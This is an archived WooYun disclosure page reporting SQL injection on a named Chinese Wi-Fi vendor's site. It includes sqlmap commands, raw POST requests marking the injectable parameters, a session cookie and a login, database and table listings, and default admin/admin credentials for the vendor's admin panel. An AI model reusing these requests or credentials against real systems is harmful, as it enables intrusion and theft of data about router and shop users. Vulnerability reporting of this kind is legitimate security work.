当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0208336

漏洞标题:wifi安全之ALLWIFISQL打包dba权限垮库查询(影响2w8千多路由/可修改app信息)

相关厂商:all-wifi.cn

漏洞作者: 黑色键盘丶

提交时间:2016-05-14 09:38

修复时间:2016-06-28 19:00

公开时间:2016-06-28 19:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-14: 细节已通知厂商并且等待厂商处理中
2016-05-14: 厂商已经确认,细节仅向厂商公开
2016-05-24: 细节向核心白帽子及相关领域专家公开
2016-06-03: 细节向普通白帽子公开
2016-06-13: 细节向实习白帽子公开
2016-06-28: 细节向公众公开

简要描述:

RT

详细说明:

sqlmap语法:sqlmap.py -r 1.txt --dbs
----------------------------tel参数-----post数据包------------------
POST /index.php/Contacts/add HTTP/1.1
Host: social.all-wifi.cn
Proxy-Connection: keep-alive
Content-Length: 85
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://social.all-wifi.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://social.all-wifi.cn/index.php/Contacts/contacts
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=0mu3236cmhmmcv3gtas3r790e5
tel=111&type=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%B9%E6%96%B9%E6%89%8B%E6%9C%BA%E5%8F%B7
------------------------------------------------
sqlmap语法:sqlmap.py -r 2.txt --dbs
-----------------------------------post数据包----telephone参数
POST /index.php/Login/login HTTP/1.1
Host: social.all-wifi.cn
Proxy-Connection: keep-alive
Content-Length: 37
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://social.all-wifi.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://social.all-wifi.cn/index.php/Login/login
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=0mu3236cmhmmcv3gtas3r790e5
telephone=13656785601&password=qwe123


数据库信息
mask 区域
*****MS: My*****
*****atabas*****
*****allw*****
*****allw*****
*****iji*****
*****acti*****
*****_coll*****
*****tion_s*****
*****ing*****
*****ysq*****
*****ance_s*****
*****ort*****
*****xyal*****
*****zjk*****
*****hej*****
*****oci*****
*****est*****
*****ifi*****
*****llwi*****
*****llwif*****
*****oqing*****
*****x_y*****
*****xdl*****
*****xgw*****
*****xzf*****


当前库表信息

Database: social
mask 区域
*****----+--*****
***** | E*****
*****----+--*****
***** | 2*****
***** | 5*****
***** | 3*****
*****n | 2*****
***** | 1*****
***** | 8*****
***** | 6*****
***** | 5*****
***** | 4*****
*****opy | 3*****
***** | 1*****
***** | 1*****
*****----+--*****


垮裤查询
Database: wifi 这里的百万好像是access point什么的 几百万
mask 区域
*****----+---*****
***** | En*****
*****----+---*****
***** | 24*****
***** | 48*****
***** | 28*****
***** | 27*****
***** | 34*****
***** | 34*****
***** | 10*****
***** | 10*****
***** | 29*****
***** | 70*****
***** | 70*****
***** | 54*****
***** | 32*****
***** | 24*****
***** | 13*****
***** | 12*****
***** | 11*****
*****_ad | 7 *****
*****e | 4 *****
***** | 3 *****
*****r | 3 *****
***** | 2 *****
***** | 2 *****
*****ers | 1 *****
***** | 1 *****
*****el | 1 *****
*****------+*****


2w8千路由信息 dump看了几条下农业银行的路由


11.png


http://xx.all-wifi.cn/admin/default.php admin admin 进入


可对app进行修改

333.png


33333.png

漏洞证明:

sqlmap语法:sqlmap.py -r 1.txt --dbs
----------------------------tel参数-----post数据包------------------
POST /index.php/Contacts/add HTTP/1.1
Host: social.all-wifi.cn
Proxy-Connection: keep-alive
Content-Length: 85
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://social.all-wifi.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://social.all-wifi.cn/index.php/Contacts/contacts
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=0mu3236cmhmmcv3gtas3r790e5
tel=111&type=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%B9%E6%96%B9%E6%89%8B%E6%9C%BA%E5%8F%B7
------------------------------------------------
sqlmap语法:sqlmap.py -r 2.txt --dbs
-----------------------------------post数据包----telephone参数
POST /index.php/Login/login HTTP/1.1
Host: social.all-wifi.cn
Proxy-Connection: keep-alive
Content-Length: 37
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://social.all-wifi.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://social.all-wifi.cn/index.php/Login/login
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=0mu3236cmhmmcv3gtas3r790e5
telephone=13656785601&password=qwe123


数据库信息
back-end DBMS: MySQL 5.0
available databases [23]:
[*] actallwifi
[*] appallwificn
[*] dijiuqu
[*] gy_activity
[*] ik_ap_collect
[*] information_schema
[*] jingcai
[*] mysql
[*] performance_schema
[*] portal
[*] proxyallwifi
[*] qzjkd
[*] shejiao
[*] social
[*] test
[*] wifi
[*] wxallwificn
[*] xx98allwificn
[*] xx_yaoqinghan
[*] xx_yjhx
[*] xxdl
[*] xxgw
[*] xxzfproxy


当前库表信息

Database: social
+----------------+---------+
| Table | Entries |
+----------------+---------+
| tp_apinfo | 24101 |
| request | 55 |
| msg | 30 |
| verification | 23 |
| userinfo | 11 |
| groupmember | 8 |
| `group` | 6 |
| friends | 5 |
| friend | 4 |
| ns_online_copy | 3 |
| `user` | 1 |
| admin | 1 |
+----------------+---------+


垮裤查询
Database: wifi 这里的百万好像是access point什么的 几百万
+------------------+---------+
| Table | Entries |
+------------------+---------+
| wifi_adrecode | 24421932 |
| wifi_adcount | 4858467 |
| apinfo | 28382 |
| wifi_routemap | 27577 |
| shopinfo | 3440 |
| wifi_shop | 3440 |
| wifi_member | 1002 |
| ns_user | 1000 |
| wifi_authlist | 294 |
| wifi_access | 70 |
| wifi_treenode | 70 |
| wifi_ad | 54 |
| wifi_day | 32 |
| wifi_hours | 24 |
| wifi_waptpl | 13 |
| wifi_month | 12 |
| wifi_trade | 11 |
| wifi_routemap_ad | 7 |
| wifi_advertise | 4 |
| wifi_admin | 3 |
| wifi_role_user | 3 |
| wifi_authtpl | 2 |
| wifi_role | 2 |
| wifi_advertisers | 1 |
| wifi_agent | 1 |
| wifi_agentlevel | 1 |
+------------------+---------+


2w8千路由信息 dump看了几条下农业银行的路由


11.png


http://xx.all-wifi.cn/admin/default.php admin admin 进入


可对app进行修改

333.png


33333.png

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-14 18:55

厂商回复:

谢谢,正在修复

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-14 09:49 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    666

  2. 2016-05-15 09:00 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg?得失乐与悲与Av Qq205655539)

    666